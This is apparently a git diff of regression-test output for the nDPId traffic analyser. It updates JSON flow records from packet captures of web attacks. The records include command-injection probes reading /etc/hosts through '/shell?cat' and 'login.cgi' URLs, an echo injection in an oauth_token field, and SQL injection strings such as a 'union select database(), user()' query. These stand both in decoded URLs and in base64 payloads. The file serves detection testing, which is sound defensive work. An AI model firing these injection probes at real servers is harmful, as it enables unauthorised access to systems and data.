+01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7580000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007187)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_packet_id":1,"flow_last_seen":1576420278010,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278010,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/OK1AAEAGAwp\/AAABfwAAAcgAH5D7EgH2VMq6xIAYAED\/MwAAAQEICp1nACKdZwAiR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlMTEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODgpDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007188)"}} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007188)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":1576420278012,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1576420278012,"pkt":"AAAAAAAAAAAAAAAACABFAAFJWQ5AAEAG4p5\/AAABfwAAAcgCH5Cjm2BUk9d3uYAYAED\/PQAAAQEICp1nACSdZwAkR0VUIC9sb2dpbi5jZ2k\/Y2xpPWFhJTIwYWElMjdjYXQlMjAvZXRjL2hvc3RzIEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MjM0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi?cli=aa%20aa%27cat%20\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007234)"}} 
+01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi?cli=aa%20aa%27cat%20\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007234)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":1576420278014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1576420278014,"pkt":"AAAAAAAAAAAAAAAACABFAAE1Ck9AAEAGMXJ\/AAABfwAAAcgEH5AitzMTI6HHCIAYAED\/KQAAAQEICp1nACadZwAmR0VUIC9zaGVsbD9jYXQrL2V0Yy9ob3N0cyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzIzNSkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat+\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007235)"}} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat+\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007235)"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -3197,9 +3197,9 @@ ~~ total active/idle flows...: 797/797 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6859539 bytes -~~ total memory freed........: 6859539 bytes -~~ total allocations/frees...: 126032/126032 +~~ total memory allocated....: 6993173 bytes +~~ total memory freed........: 6993173 bytes +~~ total allocations/frees...: 128794/128794 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 1395 chars diff --git a/test/results/WebattackSQLinj.pcap.out b/test/results/WebattackSQLinj.pcap.out index 9b4c861ae..efaf4ee05 100644 --- a/test/results/WebattackSQLinj.pcap.out +++ b/test/results/WebattackSQLinj.pcap.out 
@@ -4,56 +4,56 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499348407419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84aRAAD4G5CusEAABwKgKMo1kAFAWk4RJAAAAAKACchDPRwAAAgQFtAQCCAoBPmXtAAAAAAEDAwc="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499348407419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWS7EzBkFpOESqAScSCpZgAAAgQFtAQCCAoD6DdgAT5l7QEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499348407420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348407420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04aVAAD4G5DKsEAABwKgKMo1kAFAWk4RKuxMwZYAQAOVIbgAAAQEICgE+Ze0D6Ddg"} 
-00993{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348407419,"flow_last_seen":1499348407420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1499348407420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00993{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348407419,"flow_last_seen":1499348407420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1499348407420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348413192,"flow_last_seen":1499348413192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348413192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499348413192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/kNAAD4Gx4ysEAABwKgKMo1mAFAV3ZXTAAAAAKACchC4zgAAAgQFtAQCCAoBPmuQAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499348413192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWbwopjJFd2V1KAScSDvVQAAAgQFtAQCCAoD6D0DAT5rkAEDAwc="} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1499348413193,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348413193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/kRAAD4Gx5OsEAABwKgKMo1mAFAV3ZXU8KKYyoAQAOWOXQAAAQEICgE+a5AD6D0D"} -01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348413192,"flow_last_seen":1499348413193,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":460,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1499348413193,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348413192,"flow_last_seen":1499348413193,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":460,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1499348413193,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348422024,"flow_last_seen":1499348422024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348422024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1499348422024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8A7ZAAD4GwhqsEAABwKgKMo1oAFD9gXeGAAAAAKACchDm1AAAAgQFtAQCCAoBPnQwAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1499348422024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWik93fQ\/YF3h6AScSCBYAAAAgQFtAQCCAoD6EWjAT50MAEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1499348422025,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348422025,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0A7dAAD4GwiGsEAABwKgKMo1oAFD9gXeHpPd30YAQAOUgaAAAAQEICgE+dDAD6EWj"} 
-01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348422024,"flow_last_seen":1499348422025,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348422025,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348422024,"flow_last_seen":1499348422025,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348422025,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
